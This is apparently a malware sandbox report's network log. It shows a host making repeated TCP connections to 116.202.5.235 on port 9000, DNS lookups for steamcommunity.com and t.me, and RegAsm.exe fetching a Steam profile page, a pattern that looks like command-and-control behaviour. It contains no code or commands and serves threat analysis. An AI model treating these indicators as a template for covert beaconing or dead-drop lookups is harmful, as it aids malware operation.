May 19, 2024 09:09:08.892965078 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.892997980 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.893033981 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.893070936 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.893379927 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.893413067 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.893553972 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.893553972 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.897849083 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.897885084 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.898050070 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.898051023 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.898255110 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.898288965 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.898312092 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.898349047 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.902765989 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.902800083 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.902838945 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.902870893 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.903207064 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.903244972 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.903275013 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.903295040 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.903295040 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.903373957 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.907668114 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.907737970 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.907767057 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.907861948 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.907861948 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.907862902 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.908121109 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.908153057 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.908183098 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.908301115 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.908301115 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.908302069 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.912609100 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.912642002 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.912683010 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.912683010 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.912980080 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.913012028 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.913173914 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.913173914 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.917498112 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.917531967 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.917562962 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.917691946 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.917692900 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.917692900 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.917921066 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.917953968 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.918100119 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.918100119 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.922383070 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.922415018 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.922446012 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.922456026 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.922489882 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.922489882 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.922831059 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.922864914 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.923005104 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.923005104 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.927376986 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.927408934 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.927439928 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.927563906 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.927565098 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.927565098 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.927676916 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.927711964 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.927747011 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.927800894 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.932180882 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.932250023 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.932281971 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.932292938 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.932326078 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.932326078 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.932847977 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.932882071 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.933007956 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.933008909 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.937138081 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.937171936 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.937203884 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.937333107 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.937334061 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.937334061 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.937614918 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.937685013 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.937791109 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.937792063 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.942023993 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.942059994 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.942087889 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.942125082 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.942512035 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.942545891 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.942575932 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.942686081 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.942686081 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.942687035 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.946932077 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.946964025 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.946991920 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.947133064 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.947133064 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.947133064 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.947410107 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.947443008 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.947473049 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.947582006 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.947582006 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.947582960 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.951843023 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.951875925 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.951904058 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.951905966 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.951930046 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.951965094 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.952198982 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.952230930 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.952403069 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.952404022 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.956733942 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.956767082 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.956798077 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.956799984 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.956839085 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.956876993 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:09.071677923 CEST	49749	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:09.072154999 CEST	49751	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:09.077868938 CEST	9000	49749	116.202.5.235	192.168.2.4
May 19, 2024 09:09:09.080904961 CEST	49749	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:09.125077963 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:09.125154018 CEST	49751	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:09.125709057 CEST	49751	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:09.134501934 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:09.865142107 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:09.865252972 CEST	49751	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:09.865607023 CEST	49751	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:09.867182970 CEST	49751	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:09.867247105 CEST	49751	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:09.872373104 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:09.920991898 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:09.921010017 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:09.921020985 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:09.921032906 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:09.921045065 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:10.169177055 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.169600964 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.175101042 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:10.175163031 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.180058956 CEST	9000	49752	116.202.5.235	192.168.2.4
May 19, 2024 09:09:10.180114031 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.180427074 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.237895966 CEST	9000	49752	116.202.5.235	192.168.2.4
May 19, 2024 09:09:10.556093931 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:10.556226969 CEST	49751	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.894422054 CEST	9000	49752	116.202.5.235	192.168.2.4
May 19, 2024 09:09:10.894490957 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.895173073 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.897614956 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.897658110 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.902611017 CEST	9000	49752	116.202.5.235	192.168.2.4
May 19, 2024 09:09:10.935929060 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:10.949294090 CEST	9000	49752	116.202.5.235	192.168.2.4
May 19, 2024 09:09:10.949343920 CEST	9000	49752	116.202.5.235	192.168.2.4
May 19, 2024 09:09:10.949373007 CEST	9000	49752	116.202.5.235	192.168.2.4
May 19, 2024 09:09:10.953880072 CEST	9000	49752	116.202.5.235	192.168.2.4
May 19, 2024 09:09:11.174866915 CEST	49751	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:11.175553083 CEST	49753	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:11.180815935 CEST	9000	49751	116.202.5.235	192.168.2.4
May 19, 2024 09:09:11.180886030 CEST	49751	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:11.185648918 CEST	9000	49753	116.202.5.235	192.168.2.4
May 19, 2024 09:09:11.185709000 CEST	49753	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:11.186286926 CEST	49753	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:11.237802982 CEST	9000	49753	116.202.5.235	192.168.2.4
May 19, 2024 09:09:11.589224100 CEST	9000	49752	116.202.5.235	192.168.2.4
May 19, 2024 09:09:11.589955091 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:11.963466883 CEST	9000	49753	116.202.5.235	192.168.2.4
May 19, 2024 09:09:11.966901064 CEST	49753	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:12.904608965 CEST	49753	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:12.910141945 CEST	49753	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:12.929786921 CEST	9000	49753	116.202.5.235	192.168.2.4
May 19, 2024 09:09:12.929805994 CEST	9000	49753	116.202.5.235	192.168.2.4
May 19, 2024 09:09:13.051363945 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:13.051925898 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:13.125025988 CEST	9000	49754	116.202.5.235	192.168.2.4
May 19, 2024 09:09:13.125041962 CEST	9000	49752	116.202.5.235	192.168.2.4
May 19, 2024 09:09:13.125128031 CEST	49752	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:13.125268936 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:13.125463009 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:13.169470072 CEST	9000	49754	116.202.5.235	192.168.2.4
May 19, 2024 09:09:13.581639051 CEST	9000	49753	116.202.5.235	192.168.2.4
May 19, 2024 09:09:13.581712008 CEST	49753	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:13.865622997 CEST	9000	49754	116.202.5.235	192.168.2.4
May 19, 2024 09:09:13.865798950 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:13.866147041 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:13.867722988 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:13.876220942 CEST	9000	49754	116.202.5.235	192.168.2.4
May 19, 2024 09:09:13.925179005 CEST	9000	49754	116.202.5.235	192.168.2.4
May 19, 2024 09:09:14.102843046 CEST	49753	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.103235960 CEST	49755	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.153690100 CEST	9000	49755	116.202.5.235	192.168.2.4
May 19, 2024 09:09:14.153765917 CEST	49755	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.154077053 CEST	49755	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.158638954 CEST	9000	49753	116.202.5.235	192.168.2.4
May 19, 2024 09:09:14.158693075 CEST	49753	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.163502932 CEST	9000	49755	116.202.5.235	192.168.2.4
May 19, 2024 09:09:14.545948982 CEST	9000	49754	116.202.5.235	192.168.2.4
May 19, 2024 09:09:14.546180964 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.832890034 CEST	9000	49755	116.202.5.235	192.168.2.4
May 19, 2024 09:09:14.832959890 CEST	49755	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.833415985 CEST	49755	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.834881067 CEST	49755	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.836880922 CEST	49757	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.840054989 CEST	9000	49755	116.202.5.235	192.168.2.4
May 19, 2024 09:09:14.845645905 CEST	9000	49757	116.202.5.235	192.168.2.4
May 19, 2024 09:09:14.845698118 CEST	9000	49755	116.202.5.235	192.168.2.4
May 19, 2024 09:09:14.845727921 CEST	49757	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.845745087 CEST	49755	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.846076012 CEST	49757	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:14.854417086 CEST	9000	49757	116.202.5.235	192.168.2.4
May 19, 2024 09:09:15.520616055 CEST	9000	49757	116.202.5.235	192.168.2.4
May 19, 2024 09:09:15.520773888 CEST	49757	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:15.521332979 CEST	49757	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:15.523056984 CEST	49757	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:15.525060892 CEST	49758	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:15.573868036 CEST	9000	49757	116.202.5.235	192.168.2.4
May 19, 2024 09:09:15.589740038 CEST	9000	49758	116.202.5.235	192.168.2.4
May 19, 2024 09:09:15.589771032 CEST	9000	49757	116.202.5.235	192.168.2.4
May 19, 2024 09:09:15.589834929 CEST	49757	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:15.589951038 CEST	49758	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:15.590136051 CEST	49758	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:15.613653898 CEST	9000	49758	116.202.5.235	192.168.2.4
May 19, 2024 09:09:16.280953884 CEST	9000	49758	116.202.5.235	192.168.2.4
May 19, 2024 09:09:16.281172991 CEST	49758	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:16.281704903 CEST	49758	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:16.283364058 CEST	49758	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:16.285202980 CEST	49759	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:16.333874941 CEST	9000	49758	116.202.5.235	192.168.2.4
May 19, 2024 09:09:16.381206036 CEST	9000	49759	116.202.5.235	192.168.2.4
May 19, 2024 09:09:16.381237984 CEST	9000	49758	116.202.5.235	192.168.2.4
May 19, 2024 09:09:16.381340981 CEST	49758	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:16.381355047 CEST	49759	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:16.381704092 CEST	49759	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:16.433783054 CEST	9000	49759	116.202.5.235	192.168.2.4
May 19, 2024 09:09:17.127244949 CEST	9000	49759	116.202.5.235	192.168.2.4
May 19, 2024 09:09:17.127463102 CEST	49759	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.127805948 CEST	49759	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.129776001 CEST	49759	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.131341934 CEST	49760	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.177707911 CEST	9000	49759	116.202.5.235	192.168.2.4
May 19, 2024 09:09:17.186577082 CEST	9000	49760	116.202.5.235	192.168.2.4
May 19, 2024 09:09:17.186608076 CEST	9000	49759	116.202.5.235	192.168.2.4
May 19, 2024 09:09:17.186675072 CEST	49760	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.186821938 CEST	49759	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.187175989 CEST	49760	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.213932037 CEST	9000	49760	116.202.5.235	192.168.2.4
May 19, 2024 09:09:17.858242035 CEST	9000	49760	116.202.5.235	192.168.2.4
May 19, 2024 09:09:17.858400106 CEST	49760	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.858795881 CEST	49760	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.860481024 CEST	49760	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.862540960 CEST	49761	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.914244890 CEST	9000	49760	116.202.5.235	192.168.2.4
May 19, 2024 09:09:17.928431988 CEST	9000	49761	116.202.5.235	192.168.2.4
May 19, 2024 09:09:17.928477049 CEST	9000	49760	116.202.5.235	192.168.2.4
May 19, 2024 09:09:17.928543091 CEST	49761	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.928577900 CEST	49760	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.929295063 CEST	49761	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:17.997338057 CEST	9000	49761	116.202.5.235	192.168.2.4
May 19, 2024 09:09:18.624519110 CEST	9000	49761	116.202.5.235	192.168.2.4
May 19, 2024 09:09:18.624800920 CEST	49761	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:18.624999046 CEST	49761	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:18.626574993 CEST	49761	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:18.656132936 CEST	9000	49761	116.202.5.235	192.168.2.4
May 19, 2024 09:09:18.656142950 CEST	9000	49761	116.202.5.235	192.168.2.4
May 19, 2024 09:09:18.656343937 CEST	49761	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:10:24.546629906 CEST	9000	49754	116.202.5.235	192.168.2.4
May 19, 2024 09:10:24.546803951 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:10:24.551322937 CEST	9000	49754	116.202.5.235	192.168.2.4
May 19, 2024 09:10:24.551374912 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:10:46.079433918 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:10:46.079529047 CEST	49754	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:10:46.084661007 CEST	9000	49754	116.202.5.235	192.168.2.4
May 19, 2024 09:10:46.084737062 CEST	49754	9000	192.168.2.4	116.202.5.235

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 19, 2024 09:08:56.110912085 CEST	62675	53	192.168.2.4	1.1.1.1
May 19, 2024 09:08:56.119693995 CEST	53	62675	1.1.1.1	192.168.2.4
May 19, 2024 09:08:57.719383955 CEST	58308	53	192.168.2.4	1.1.1.1
May 19, 2024 09:08:57.727220058 CEST	53	58308	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 19, 2024 09:08:56.110912085 CEST	192.168.2.4	1.1.1.1	0xbb2d	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
May 19, 2024 09:08:57.719383955 CEST	192.168.2.4	1.1.1.1	0x80a9	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 19, 2024 09:08:56.119693995 CEST	1.1.1.1	192.168.2.4	0xbb2d	No error (0)	steamcommunity.com		104.102.42.29	A (IP address)	IN (0x0001)	false
May 19, 2024 09:08:57.727220058 CEST	1.1.1.1	192.168.2.4	0x80a9	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

t.me

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49742	104.102.42.29	443	3264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-19 07:08:56 UTC	119	OUT	GET /profiles/76561199686524322 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-05-19 07:08:57 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sun, 19 May 2024 07:08:57 GMT Content-Length: 34714 Connection: close Set-Cookie: sessionid=df57117786338ce5fe291fe0; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cdb4b65ccf73e10faf6e66b5283c89f73; Path=/; Secure; HttpOnly; SameSite=None
